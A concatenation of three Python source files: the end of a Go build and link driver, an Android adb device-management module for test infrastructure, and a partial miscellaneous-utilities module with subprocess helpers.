def do_link_test(args):
assert args.srcs or args.xtest_srcs
assert args.test_miner is not None
test_module_path = get_source_path(args)
test_import_path, _ = get_import_path(test_module_path)
test_lib_args = copy_args(args) if args.srcs else None
xtest_lib_args = copy_args(args) if args.xtest_srcs else None
if xtest_lib_args is not None:
xtest_lib_args.embed = args.embed_xtest if args.embed_xtest else None
ydx_file_name = None
xtest_ydx_file_name = None
need_append_ydx = test_lib_args and xtest_lib_args and args.ydx_file and args.vet_flags
if need_append_ydx:
def find_ydx_file_name(name, flags):
for i, elem in enumerate(flags):
if elem.endswith(name):
return (i, elem)
assert False, 'Unreachable code'
idx, ydx_file_name = find_ydx_file_name(xtest_lib_args.ydx_file, xtest_lib_args.vet_flags)
xtest_ydx_file_name = '{}_xtest'.format(ydx_file_name)
xtest_lib_args.vet_flags = copy.copy(xtest_lib_args.vet_flags)
xtest_lib_args.vet_flags[idx] = xtest_ydx_file_name
if test_lib_args:
test_lib_args.output = os.path.join(args.output_root, 'test.a')
test_lib_args.vet_report_output = vet_report_output_name(test_lib_args.output)
test_lib_args.module_path = test_module_path
test_lib_args.import_path = test_import_path
do_link_lib(test_lib_args)
if xtest_lib_args:
xtest_lib_args.srcs = xtest_lib_args.xtest_srcs
classify_srcs(xtest_lib_args.srcs, xtest_lib_args)
xtest_lib_args.output = os.path.join(args.output_root, 'xtest.a')
xtest_lib_args.vet_report_output = vet_report_output_name(xtest_lib_args.output)
xtest_lib_args.module_path = test_module_path + '_test'
xtest_lib_args.import_path = test_import_path + '_test'
if test_lib_args:
xtest_lib_args.module_map[test_import_path] = test_lib_args.output
need_append_ydx = args.ydx_file and args.srcs and args.vet_flags
do_link_lib(xtest_lib_args)
if need_append_ydx:
with open(os.path.join(args.build_root, ydx_file_name), 'ab') as dst_file:
with open(os.path.join(args.build_root, xtest_ydx_file_name), 'rb') as src_file:
dst_file.write(src_file.read())
test_main_content = gen_test_main(args, test_lib_args, xtest_lib_args)
test_main_name = os.path.join(args.output_root, '_test_main.go')
with open(test_main_name, "w") as f:
f.write(test_main_content)
test_args = copy_args(args)
test_args.embed = None
test_args.srcs = [test_main_name]
if test_args.test_import_path is None:
# it seems that we could do this unconditionally, but this kind
# of mangling doesn't really look good to me, so we only do it
# for the pure GO_TEST module
test_args.module_path = test_args.module_path + '___test_main__'
test_args.import_path = test_args.import_path + '___test_main__'
classify_srcs(test_args.srcs, test_args)
if test_lib_args:
test_args.module_map[test_lib_args.import_path] = test_lib_args.output
if xtest_lib_args:
test_args.module_map[xtest_lib_args.import_path] = xtest_lib_args.output
if args.vet:
dump_vet_report_for_tests(test_args, test_lib_args, xtest_lib_args)
test_args.vet = False
do_link_exe(test_args)
if __name__ == '__main__':
args = pcf.get_args(sys.argv[1:])
parser = argparse.ArgumentParser(prefix_chars='+')
parser.add_argument('++mode', choices=['dll', 'exe', 'lib', 'test'], required=True)
parser.add_argument('++srcs', nargs='*', required=True)
parser.add_argument('++cgo-srcs', nargs='*')
parser.add_argument('++test_srcs', nargs='*')
parser.add_argument('++xtest_srcs', nargs='*')
parser.add_argument('++cover_info', nargs='*')
parser.add_argument('++output', nargs='?', default=None)
parser.add_argument('++source-root', default=None)
parser.add_argument('++build-root', required=True)
parser.add_argument('++tools-root', default=None)
parser.add_argument('++output-root', required=True)
parser.add_argument('++toolchain-root', required=True)
parser.add_argument('++host-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++host-arch', choices=['amd64'], required=True)
parser.add_argument('++targ-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++targ-arch', choices=['amd64', 'x86'], required=True)
parser.add_argument('++peers', nargs='*')
parser.add_argument('++non-local-peers', nargs='*')
parser.add_argument('++cgo-peers', nargs='*')
parser.add_argument('++asmhdr', nargs='?', default=None)
parser.add_argument('++test-import-path', nargs='?')
parser.add_argument('++test-miner', nargs='?')
parser.add_argument('++arc-project-prefix', nargs='?', default=arc_project_prefix)
parser.add_argument('++std-lib-prefix', nargs='?', default=std_lib_prefix)
parser.add_argument('++vendor-prefix', nargs='?', default=vendor_prefix)
parser.add_argument('++extld', nargs='?', default=None)
parser.add_argument('++extldflags', nargs='+', default=None)
parser.add_argument('++goversion', required=True)
parser.add_argument('++asm-flags', nargs='*')
parser.add_argument('++compile-flags', nargs='*')
parser.add_argument('++link-flags', nargs='*')
parser.add_argument('++vcs', nargs='?', default=None)
parser.add_argument('++vet', nargs='?', const=True, default=False)
parser.add_argument('++vet-flags', nargs='*', default=None)
parser.add_argument('++vet-info-ext', default=vet_info_ext)
parser.add_argument('++vet-report-ext', default=vet_report_ext)
parser.add_argument('++musl', action='store_true')
parser.add_argument('++skip-tests', nargs='*', default=None)
parser.add_argument('++ydx-file', default='')
parser.add_argument('++debug-root-map', default=None)
parser.add_argument('++embed', action='append', nargs='*')
parser.add_argument('++embed_xtest', action='append', nargs='*')
args = parser.parse_args(args)
arc_project_prefix = args.arc_project_prefix
std_lib_prefix = args.std_lib_prefix
vendor_prefix = args.vendor_prefix
vet_info_ext = args.vet_info_ext
vet_report_ext = args.vet_report_ext
preprocess_args(args)
try:
os.unlink(args.output)
except OSError:
pass
# We currently support only the 'lib', 'exe', 'dll' and 'test' build modes
# and as a result we are going to generate only one build node per module
# (or program)
dispatch = {
'exe': do_link_exe,
'dll': do_link_exe,
'lib': do_link_lib,
'test': do_link_test
}
exit_code = 1
try:
dispatch[args.mode](args)
exit_code = 0
except KeyError:
sys.stderr.write('Unknown build mode [{}]...\n'.format(args.mode))
except subprocess.CalledProcessError as e:
sys.stderr.write('{} returned non-zero exit code {}.\n{}\n'.format(' '.join(e.cmd), e.returncode, e.output))
exit_code = e.returncode
except Exception as e:
sys.stderr.write('Unhandled exception [{}]...\n'.format(str(e)))
sys.exit(exit_code)
|
adb.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ADB shell related functions."""
import collections
import glob
import os
import re
import signal
import subprocess
import tempfile
import threading
import time
from base import persistent_cache
from base import utils
from metrics import logs
from system import environment
from system import shell
ADB_TIMEOUT = 1200 # Should be lower than |REBOOT_TIMEOUT|.
BAD_STATE_WAIT = 900
BOOT_WAIT_INTERVAL = 30
DEFAULT_DEVICE_MEMORY_MB = 2048
DEVICE = collections.namedtuple('Device', ['serial', 'path'])
DEVICE_HANG_STRING = None
DEVICE_NOT_FOUND_STRING = 'error: device \'{serial}\' not found'
DEVICE_OFFLINE_STRING = 'error: device offline'
FACTORY_RESET_WAIT = 60
KERNEL_LOG_FILES = [
'/proc/last_kmsg',
'/sys/fs/pstore/console-ramoops',
]
MONKEY_PROCESS_NAME = 'monkey'
REBOOT_TIMEOUT = 3600
RECOVERY_CMD_TIMEOUT = 60
STOP_CVD_WAIT = 20
# Output patterns to parse "lsusb" output.
LSUSB_BUS_RE = re.compile(r'Bus\s+(\d+)\s+Device\s+(\d+):.*')
LSUSB_SERIAL_RE = re.compile(r'\s+iSerial\s+\d\s+(.*)')
# This is a constant value defined in usbdevice_fs.h in Linux system.
USBDEVFS_RESET = ord('U') << 8 | 20
def bad_state_reached():
"""Wait when device is in a bad state and exit."""
persistent_cache.clear_values()
logs.log_fatal_and_exit(
'Device in bad state.', wait_before_exit=BAD_STATE_WAIT)
def copy_local_directory_to_remote(local_directory, remote_directory):
"""Copies local directory contents to a device directory."""
create_directory_if_needed(remote_directory)
if os.listdir(local_directory):
run_command(['push', '%s/.' % local_directory, remote_directory])
def copy_local_file_to_remote(local_file_path, remote_file_path):
"""Copies local file to a device file."""
create_directory_if_needed(os.path.dirname(remote_file_path))
run_command(['push', local_file_path, remote_file_path])
def copy_remote_directory_to_local(remote_directory, local_directory):
"""Copies local directory contents to a device directory."""
run_command(['pull', '%s/.' % remote_directory, local_directory])
def copy_remote_file_to_local(remote_file_path, local_file_path):
"""Copies device file to a local file."""
shell.create_directory(
os.path.dirname(local_file_path), create_intermediates=True)
run_command(['pull', remote_file_path, local_file_path])
def create_directory_if_needed(device_directory):
"""Creates a directory on the device if it doesn't already exist."""
run_shell_command(['mkdir', '-p', device_directory])
def directory_exists(directory_path):
"""Return whether a directory exists or not."""
expected = '0'
result = run_shell_command(
'\'test -d "%s"; echo $?\'' % directory_path, log_error=False)
return result == expected
def execute_command(cmd, timeout=None, log_error=True):
"""Spawns a subprocess to run the given shell command."""
so = []
# pylint: disable=consider-using-with
output_dest = tempfile.TemporaryFile()
# pylint: disable=subprocess-popen-preexec-fn,consider-using-with
pipe = subprocess.Popen(
cmd,
executable='/bin/bash',
stdout=output_dest,
stderr=subprocess.STDOUT,
shell=True,
preexec_fn=lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL),
bufsize=0)
def run():
"""Thread target function that waits for subprocess to complete."""
try:
pipe.communicate()
output_dest.seek(0)
output = output_dest.read()
output_dest.close()
if output:
so.append(output)
except OSError as _:
logs.log_warn('Failed to retrieve stdout from: %s' % cmd)
if pipe.returncode:
if log_error:
logs.log_warn(
'%s returned %d error code.' % (cmd, pipe.returncode),
output=output)
thread = threading.Thread(target=run)
thread.start()
thread.join(timeout)
if thread.is_alive():
try:
pipe.kill()
except OSError:
# Can't kill a dead process.
pass
return None
bytes_output = b''.join(so)
return bytes_output.strip().decode('utf-8', errors='ignore')
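# Illustrative sketch (not part of the original module): execute_command() above
# runs a host-side shell command and returns its decoded output, or None if the
# command did not finish within the timeout. The command and timeout below are
# arbitrary.
def _example_execute_host_command():
  return execute_command('uname -a', timeout=10)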
def factory_reset():
"""Reset device to factory state."""
if is_gce() or environment.is_android_emulator():
# We cannot recover from this since there can be cases like userdata image
# corruption in /data/data. Till the bug is fixed, we just need to wait
# for reimage in next iteration.
bad_state_reached()
# A device can be stuck in a boot loop due to a bad clang library update.
# Reverting that can bring a device back to good state.
revert_asan_device_setup_if_needed()
run_as_root()
run_shell_command([
'am', 'broadcast', '-a', 'android.intent.action.MASTER_CLEAR', '-n',
'android/com.android.server.MasterClearReceiver'
])
# Wait until the reset is complete.
time.sleep(FACTORY_RESET_WAIT)
def file_exists(file_path):
"""Return whether a file exists or not."""
expected = '0'
result = run_shell_command(
'\'test -f "%s"; echo $?\'' % file_path, log_error=False)
return result == expected
def get_adb_command_line(adb_cmd):
"""Return adb command line for running an adb command."""
device_serial = environment.get_value('ANDROID_SERIAL')
adb_cmd_line = '%s -s %s %s' % (get_adb_path(), device_serial, adb_cmd)
return adb_cmd_line
def get_adb_path():
"""Return path to ADB binary."""
adb_path = environment.get_value('ADB')
if adb_path:
return adb_path
return os.path.join(environment.get_platform_resources_directory(), 'adb')
def get_device_state():
"""Return the device status."""
state_cmd = get_adb_command_line('get-state')
return execute_command(state_cmd, timeout=RECOVERY_CMD_TIMEOUT)
def get_fastboot_command_line(fastboot_cmd):
"""Return fastboot command line for running a fastboot command."""
fastboot_cmd_line = '%s %s' % (get_fastboot_path(), fastboot_cmd)
return fastboot_cmd_line
def get_fastboot_path():
"""Return path to fastboot binary."""
return os.path.join(environment.get_platform_resources_directory(),
'fastboot')
def get_file_checksum(file_path):
"""Return file's md5 checksum."""
if not file_exists(file_path):
return None
return run_shell_command(['md5sum', '-b', file_path])
def get_file_size(file_path):
"""Return file's size."""
if not file_exists(file_path):
return None
return int(run_shell_command(['stat', '-c%s', file_path]))
def get_kernel_log_content():
"""Return content of kernel logs."""
kernel_log_content = ''
for kernel_log_file in KERNEL_LOG_FILES:
kernel_log_content += read_data_from_file(kernel_log_file) or ''
return kernel_log_content
def get_ps_output():
"""Return ps output for all processes."""
return run_shell_command(['ps', '-A'])
def get_process_and_child_pids(process_name):
"""Return process and child pids matching a process name."""
pids = []
ps_output_lines = get_ps_output().splitlines()
while True:
old_pids_length = len(pids)
for line in ps_output_lines:
data = line.split()
# Make sure we have a valid pid and parent pid.
try:
# PID is in the second column.
line_process_pid = int(data[1])
# Parent PID is in the third column.
line_parent_pid = int(data[2])
except:
continue
# If we have already processed this pid, no more work to do.
if line_process_pid in pids:
continue
# Process name is in the last column.
# Monkey framework instances (if any) are children of our process launch,
# so include these in pid list.
line_process_name = data[-1]
if (process_name in line_process_name or
MONKEY_PROCESS_NAME in line_process_name):
if process_name == line_process_name:
pids.insert(0, line_process_pid)
else:
pids.append(line_process_pid)
continue
# Add child pids to end.
if line_parent_pid in pids:
pids.append(line_process_pid)
new_pids_length = len(pids)
if old_pids_length == new_pids_length:
break
return pids
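# Illustrative sketch (not part of the original module): the 'ps -A' columns the
# parser above relies on - PID in the second column, parent PID in the third and
# the process name in the last one. The sample line is made up.
def _example_ps_line_columns():
  data = 'u0_a123  4242  1234  123456  54321  SyS_epoll 0 S com.example.app'.split()
  assert int(data[1]) == 4242      # process pid
  assert int(data[2]) == 1234      # parent pid
  assert data[-1] == 'com.example.app'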
def get_property(property_name):
"""Return property's value."""
return run_shell_command(['getprop', property_name])
def hard_reset():
"""Perform a hard reset of the device."""
if is_gce() or environment.is_android_emulator():
# There is no recovery step at this point for a gce bot, so just exit
# and wait for reimage on next iteration.
bad_state_reached()
# For physical device.
# Try hard-reset via sysrq-trigger (requires root).
hard_reset_sysrq_cmd = get_adb_command_line(
'shell echo b \\> /proc/sysrq-trigger')
execute_command(hard_reset_sysrq_cmd, timeout=RECOVERY_CMD_TIMEOUT)
# Try soft-reset now (does not require root).
soft_reset_cmd = get_adb_command_line('reboot')
execute_command(soft_reset_cmd, timeout=RECOVERY_CMD_TIMEOUT)
def is_gce():
"""Returns if we are running in GCE environment."""
android_serial = environment.get_value('ANDROID_SERIAL')
return android_serial.startswith('127.0.0.1:')
def kill_processes_and_children_matching_name(process_name):
"""Kills process along with children matching names."""
process_and_child_pids = get_process_and_child_pids(process_name)
if not process_and_child_pids:
return
kill_command = ['kill', '-9'] + process_and_child_pids
run_shell_command(kill_command)
def read_data_from_file(file_path):
"""Return device's file content."""
if not file_exists(file_path):
return None
return run_shell_command(['cat', '"%s"' % file_path])
def reboot():
"""Reboots device."""
run_command('reboot')
def start_gce_device():
"""Start the gce device."""
cvd_dir = environment.get_value('CVD_DIR')
cvd_bin_dir = os.path.join(cvd_dir, 'bin')
launch_cvd_path = os.path.join(cvd_bin_dir, 'launch_cvd')
device_memory_mb = environment.get_value('DEVICE_MEMORY_MB',
DEFAULT_DEVICE_MEMORY_MB)
launch_cvd_command_line = (
'{launch_cvd_path} -daemon -memory_mb {device_memory_mb}'.format(
launch_cvd_path=launch_cvd_path, device_memory_mb=device_memory_mb))
execute_command(launch_cvd_command_line)
def stop_gce_device():
"""Stops the gce device."""
cvd_dir = environment.get_value('CVD_DIR')
cvd_bin_dir = os.path.join(cvd_dir, 'bin')
stop_cvd_path = os.path.join(cvd_bin_dir, 'stop_cvd')
execute_command(stop_cvd_path, timeout=RECOVERY_CMD_TIMEOUT)
time.sleep(STOP_CVD_WAIT)
def recreate_gce_device():
"""Recreate gce device, restoring from backup images."""
logs.log('Reimaging gce device.')
cvd_dir = environment.get_value('CVD_DIR')
stop_gce_device()
# Delete all existing images.
image_dir = cvd_dir
for image_file_path in glob.glob(os.path.join(image_dir, '*.img')):
shell.remove_file(image_file_path)
# Restore images from backup.
backup_image_dir = os.path.join(cvd_dir, 'backup')
for image_filename in os.listdir(backup_image_dir):
image_src = os.path.join(backup_image_dir, image_filename)
image_dest = os.path.join(image_dir, image_filename)
shell.copy_file(image_src, image_dest)
start_gce_device()
def remount():
"""Remount /system as read/write."""
run_as_root()
run_command('remount')
wait_for_device()
run_as_root()
def remove_directory(device_directory, recreate=False):
"""Delete everything inside of a device directory and recreate if needed."""
run_shell_command('rm -rf %s' % device_directory, root=True)
if recreate:
create_directory_if_needed(device_directory)
def remove_file(file_path):
"""Remove file."""
run_shell_command('rm -f %s' % file_path, root=True)
def reset_device_connection():
"""Reset the connection to the physical device through USB. Returns whether
or not the reset succeeded."""
if is_gce():
stop_gce_device()
start_gce_device()
else:
# Physical device. Try restarting usb.
reset_usb()
# Check device status.
state = get_device_state()
if state != 'device':
logs.log_warn('Device state is %s, unable to recover using usb reset/'
'gce reconnect.' % str(state))
return False
return True
def get_device_path():
"""Gets a device path to be cached and used by reset_usb."""
def _get_usb_devices():
"""Returns a list of device objects containing a serial and USB path."""
usb_list_cmd = 'lsusb -v'
output = execute_command(usb_list_cmd, timeout=RECOVERY_CMD_TIMEOUT)
if output is None:
logs.log_error('Failed to populate usb devices using lsusb, '
'host restart might be needed.')
bad_state_reached()
devices = []
path = None
for line in output.splitlines():
match = LSUSB_BUS_RE.match(line)
if match:
path = '/dev/bus/usb/%s/%s' % (match.group(1), match.group(2))
continue
match = LSUSB_SERIAL_RE.match(line)
if path and match and match.group(1):
serial = match.group(1)
devices.append(DEVICE(serial, path))
return devices
def _get_device_path_for_serial():
"""Return device path. Assumes a simple ANDROID_SERIAL."""
devices = _get_usb_devices()
for device in devices:
if device_serial == device.serial:
return device.path
return None
def _get_device_path_for_usb():
"""Returns a device path.
Assumes ANDROID_SERIAL in the form "usb:<identifier>"."""
# Android serial may reference a usb device rather than a serial number.
device_id = device_serial[len('usb:'):]
bus_number = int(
open('/sys/bus/usb/devices/%s/busnum' % device_id).read().strip())
device_number = int(
open('/sys/bus/usb/devices/%s/devnum' % device_id).read().strip())
return '/dev/bus/usb/%03d/%03d' % (bus_number, device_number)
if is_gce():
return None
device_serial = environment.get_value('ANDROID_SERIAL')
if device_serial.startswith('usb:'):
return _get_device_path_for_usb()
return _get_device_path_for_serial()
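# Illustrative sketch (not part of the original module): the 'lsusb -v' lines the
# LSUSB_BUS_RE and LSUSB_SERIAL_RE patterns above are meant to match; the bus,
# device and serial values are made up.
def _example_lsusb_parsing():
  bus_line = 'Bus 001 Device 014: ID 18d1:4ee7 Google Inc. Nexus'
  serial_line = '  iSerial                 3 0123456789ABCDEF'
  assert LSUSB_BUS_RE.match(bus_line).groups() == ('001', '014')
  assert LSUSB_SERIAL_RE.match(serial_line).group(1) == '0123456789ABCDEF'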
def reset_usb():
"""Reset USB bus for a device serial."""
if is_gce() or environment.is_android_emulator():
# Nothing to do here.
return True
# App Engine does not let us import this.
import fcntl
# We need to get latest device path since it could be changed in reboots or
# adb root restarts.
try:
device_path = get_device_path()
except IOError:
# We may reach this state if the device is no longer available.
device_path = None
if not device_path:
# Try pulling from cache (if available).
device_path = environment.get_value('DEVICE_PATH')
if not device_path:
logs.log_warn('No device path found, unable to reset usb.')
return False
try:
with open(device_path, 'w') as f:
fcntl.ioctl(f, USBDEVFS_RESET)
except:
logs.log_warn('Failed to reset usb.')
return False
# Wait for usb to recover.
wait_for_device(recover=False)
return True
def revert_asan_device_setup_if_needed():
"""Reverts ASan device setup if installed."""
if not environment.get_value('ASAN_DEVICE_SETUP'):
return
device_id = environment.get_value('ANDROID_SERIAL')
device_argument = '--device %s' % device_id
revert_argument = '--revert'
asan_device_setup_script_path = os.path.join(
environment.get_platform_resources_directory(), 'third_party',
'asan_device_setup.sh')
command = '%s %s %s' % (asan_device_setup_script_path, device_argument,
revert_argument)
execute_command(command, timeout=RECOVERY_CMD_TIMEOUT)
def run_as_root():
"""Restart adbd and runs as root."""
# Check if we are already running as root. If yes bail out.
if get_property('service.adb.root') == '1':
return
wait_for_device()
run_command('root')
wait_for_device()
def run_command(cmd,
log_output=False,
log_error=True,
timeout=None,
recover=True):
"""Run a command in adb shell."""
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if log_output:
logs.log('Running: adb %s' % cmd)
if not timeout:
timeout = ADB_TIMEOUT
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
if not recover or environment.is_android_emulator():
if log_output:
logs.log('Output: (%s)' % output)
return output
device_not_found_string_with_serial = DEVICE_NOT_FOUND_STRING.format(
serial=environment.get_value('ANDROID_SERIAL'))
if (output in [
DEVICE_HANG_STRING, DEVICE_OFFLINE_STRING,
device_not_found_string_with_serial
]):
logs.log_warn('Unable to query device, resetting device connection.')
if reset_device_connection():
# Device has successfully recovered, re-run command to get output.
# Continue execution and validate output next for |None| condition.
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
else:
output = DEVICE_HANG_STRING
if output is DEVICE_HANG_STRING:
# Handle the case where our command execution hung. This usually happens when
# the device goes into a bad state and the only way to recover is to restart it.
logs.log_warn('Unable to query device, restarting device to recover.')
hard_reset()
# Wait until we've booted and try the command again.
wait_until_fully_booted()
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
if log_output:
logs.log('Output: (%s)' % output)
return output
def run_shell_command(cmd,
log_output=False,
log_error=True,
root=False,
timeout=None,
recover=True):
"""Run adb shell command (with root if needed)."""
def _escape_specials(command):
return command.replace('\\', '\\\\').replace('"', '\\"')
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if cmd[0] not in ['"', "'"]:
cmd = '"{}"'.format(_escape_specials(cmd))
if root:
root_cmd_prefix = 'su root sh -c '
# The arguments to adb shell need to be quoted, so if we're using
# su root sh -c, quote the combined command
full_cmd = 'shell \'{}{}\''.format(root_cmd_prefix, cmd)
else:
full_cmd = 'shell {}'.format(cmd)
return run_command(
full_cmd,
log_output=log_output,
log_error=log_error,
timeout=timeout,
recover=recover)
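# ---------------------------------------------------------------------------
# Editor's usage sketch (not part of the original module). Illustrates how the
# quoting in run_shell_command() plays out; the property and path below are
# placeholders.
def _example_run_shell_commands():
  # Plain command; sent as: adb shell "getprop ro.build.version.sdk"
  sdk = run_shell_command('getprop ro.build.version.sdk')
  # Root command; sent as: adb shell 'su root sh -c "ls /data/data"'
  listing = run_shell_command('ls /data/data', root=True)
  return sdk, listing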
def run_fastboot_command(cmd, log_output=True, log_error=True, timeout=None):
"""Run a command in fastboot shell."""
if is_gce():
# We can't run fastboot commands on Android GCE instances.
return None
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if log_output:
logs.log('Running: fastboot %s' % cmd)
if not timeout:
timeout = ADB_TIMEOUT
output = execute_command(get_fastboot_command_line(cmd), timeout, log_error)
return output
def setup_adb():
"""Sets up ADB binary for use."""
adb_binary_path = get_adb_path()
# Make sure that ADB env var is set.
if not environment.get_value('ADB'):
environment.set_value('ADB', adb_binary_path)
def start_shell():
"""Stops shell."""
# Make sure we are running as root.
run_as_root()
run_shell_command('start')
wait_until_fully_booted()
def stop_shell():
"""Stops shell."""
# Make sure we are running as root.
run_as_root()
run_shell_command('stop')
def time_since_last_reboot():
"""Return time in seconds since last reboot."""
uptime_string = run_shell_command(['cat', '/proc/uptime']).split(' ')[0]
try:
return float(uptime_string)
except ValueError:
# Sometimes, adb can just hang or return empty output. In these cases, just
# return an infinite uptime value.
return float('inf')
def wait_for_device(recover=True):
"""Waits indefinitely for the device to come online."""
run_command('wait-for-device', timeout=RECOVERY_CMD_TIMEOUT, recover=recover)
def wait_until_fully_booted():
"""Wait until device is fully booted or timeout expires."""
def boot_completed():
expected = '1'
result = run_shell_command('getprop sys.boot_completed', log_error=False)
return result == expected
def drive_ready():
expected = '0'
result = run_shell_command('\'test -d "/"; echo $?\'', log_error=False)
return result == expected
def package_manager_ready():
expected = 'package:/system/framework/framework-res.apk'
result = run_shell_command('pm path android', log_error=False)
if not result:
return False
# Ignore any extra messages before or after the result we want.
return expected in result.splitlines()
# Make sure we are not already recursing inside this function.
if utils.is_recursive_call():
return False
# Wait until device is online.
wait_for_device()
start_time = time.time()
is_boot_completed = False
is_drive_ready = False
is_package_manager_ready = False
while time.time() - start_time < REBOOT_TIMEOUT:
# TODO(mbarbella): Investigate potential optimizations.
# The package manager check should also work for shell restarts.
if not is_drive_ready:
is_drive_ready = drive_ready()
if not is_package_manager_ready:
is_package_manager_ready = package_manager_ready()
if not is_boot_completed:
is_boot_completed = boot_completed()
if is_drive_ready and is_package_manager_ready and is_boot_completed:
return True
time.sleep(BOOT_WAIT_INTERVAL)
factory_reset()
logs.log_fatal_and_exit(
'Device failed to finish boot. Reset to factory settings and exited.')
# Not reached.
return False
def write_command_line_file(command_line, app_path):
"""Write command line file with command line argument for the application."""
command_line_path = environment.get_value('COMMAND_LINE_PATH')
if not command_line_path:
return
# Algorithm for filtering current command line.
# 1. Remove |APP_PATH| from front.
# 2. Add 'chrome ' to start.
# 3. Strip whitespace at start and end.
command_line_without_app_path = command_line.replace('%s ' % app_path, '')
command_line_file_contents = 'chrome %s' % (
command_line_without_app_path.strip())
write_data_to_file(command_line_file_contents, command_line_path)
def write_data_to_file(contents, file_path):
"""Writes content to file."""
# If this is a file in /system, we need to remount /system as read-write and
# after file is written, revert it back to read-only.
is_system_file = file_path.startswith('/system')
if is_system_file:
remount()
# Write file with desired contents.
run_shell_command("\"echo -n '%s' | su root dd of=%s\"" % (contents.replace(
'"', '\\"'), file_path))
# Make the command line file readable.
run_shell_command('chmod 0644 %s' % file_path, root=True)
if is_system_file:
reboot()
wait_until_fully_booted()
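# ---------------------------------------------------------------------------
# Editor's illustration (hypothetical helper, not in the original). Shows the
# pure string transformation performed by write_command_line_file() without
# touching adb; the app path and flags are placeholders.
def _example_command_line_file_contents():
  app_path = '/data/local/tmp/app_apk'
  command_line = app_path + ' --no-sandbox --disable-gpu'
  # 1. Remove |APP_PATH| from front. 2. Add 'chrome ' to start. 3. Strip.
  without_app_path = command_line.replace('%s ' % app_path, '')
  return 'chrome %s' % without_app_path.strip()
  # -> 'chrome --no-sandbox --disable-gpu'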
|
misc.py
|
# -*- coding: utf-8 -*-
"""Some miscellaneous utility functions."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD-3-Clause
from contextlib import contextmanager
import fnmatch
import gc
import inspect
from math import log
import os
from queue import Queue, Empty
from string import Formatter
import subprocess
import sys
from threading import Thread
import traceback
import numpy as np
from ..utils import _check_option, _validate_type
from ..fixes import _get_args
from ._logging import logger, verbose, warn
def _pl(x, non_pl=''):
"""Determine if plural should be used."""
len_x = x if isinstance(x, (int, np.generic)) else len(x)
return non_pl if len_x == 1 else 's'
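# Editor's example (not in the original): _pl() pluralizes based on a count or a
# sized object, e.g.
#     'found 1 file%s' % _pl(1)         -> 'found 1 file'
#     'found 3 file%s' % _pl([1, 2, 3]) -> 'found 3 files'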
def _explain_exception(start=-1, stop=None, prefix='> '):
"""Explain an exception."""
# start=-1 means "only the most recent caller"
etype, value, tb = sys.exc_info()
string = traceback.format_list(traceback.extract_tb(tb)[start:stop])
string = (''.join(string).split('\n') +
traceback.format_exception_only(etype, value))
string = ':\n' + prefix + ('\n' + prefix).join(string)
return string
def _sort_keys(x):
"""Sort and return keys of dict."""
keys = list(x.keys()) # note: not thread-safe
idx = np.argsort([str(k) for k in keys])
keys = [keys[ii] for ii in idx]
return keys
class _DefaultEventParser:
"""Parse none standard events."""
def __init__(self):
self.event_ids = dict()
def __call__(self, description, offset=1):
if description not in self.event_ids:
self.event_ids[description] = offset + len(self.event_ids)
return self.event_ids[description]
class _FormatDict(dict):
"""Help pformat() work properly."""
def __missing__(self, key):
return "{" + key + "}"
def pformat(temp, **fmt):
"""Format a template string partially.
Examples
--------
>>> pformat("{a}_{b}", a='x')
'x_{b}'
"""
formatter = Formatter()
mapping = _FormatDict(fmt)
return formatter.vformat(temp, (), mapping)
def _enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
@verbose
def run_subprocess(command, return_code=False, verbose=None, *args, **kwargs):
"""Run command using subprocess.Popen.
Run command and wait for command to complete. If the return code was zero
then return, otherwise raise CalledProcessError.
By default, this will also add stdout=subprocess.PIPE and stderr=subprocess.PIPE
to the call to Popen to suppress printing to the terminal.
Parameters
----------
command : list of str | str
Command to run as subprocess (see subprocess.Popen documentation).
return_code : bool
If True, return the return code instead of raising an error if it's
non-zero.
.. versionadded:: 0.20
%(verbose)s
*args, **kwargs : arguments
Additional arguments to pass to subprocess.Popen.
Returns
-------
stdout : str
Stdout returned by the process.
stderr : str
Stderr returned by the process.
code : int
The return code, only returned if ``return_code == True``.
"""
all_out = ''
all_err = ''
# non-blocking adapted from https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python#4896288 # noqa: E501
out_q = Queue()
err_q = Queue()
with running_subprocess(command, *args, **kwargs) as p, p.stdout, p.stderr:
out_t = Thread(target=_enqueue_output, args=(p.stdout, out_q))
err_t = Thread(target=_enqueue_output, args=(p.stderr, err_q))
out_t.daemon = True
err_t.daemon = True
out_t.start()
err_t.start()
while True:
do_break = p.poll() is not None
# read all current lines without blocking
while True:
try:
out = out_q.get(timeout=0.01)
except Empty:
break
else:
out = out.decode('utf-8')
logger.info(out)
all_out += out
while True:
try:
err = err_q.get(timeout=0.01)
except Empty:
break
else:
err = err.decode('utf-8')
# Leave this as logger.warning rather than warn(...) to
# mirror the logger.info above for stdout. This function
# is basically just a version of subprocess.call, and
# shouldn't emit Python warnings due to stderr outputs
# (the calling function can check for stderr output and
# emit a warning if it wants).
logger.warning(err)
all_err += err
if do_break:
break
output = (all_out, all_err)
if return_code:
output = output + (p.returncode,)
elif p.returncode:
print(output)
err_fun = subprocess.CalledProcessError.__init__
if 'output' in _get_args(err_fun):
raise subprocess.CalledProcessError(p.returncode, command, output)
else:
raise subprocess.CalledProcessError(p.returncode, command)
return output
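# Editor's usage sketch (not part of the original module); the commands below
# are only illustrations.
def _example_run_subprocess():
    stdout, stderr = run_subprocess([sys.executable, '-c', 'print("hello")'])
    # With return_code=True the exit status is returned instead of raising:
    stdout, stderr, code = run_subprocess(
        [sys.executable, '--version'], return_code=True)
    return stdout, stderr, code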
@contextmanager
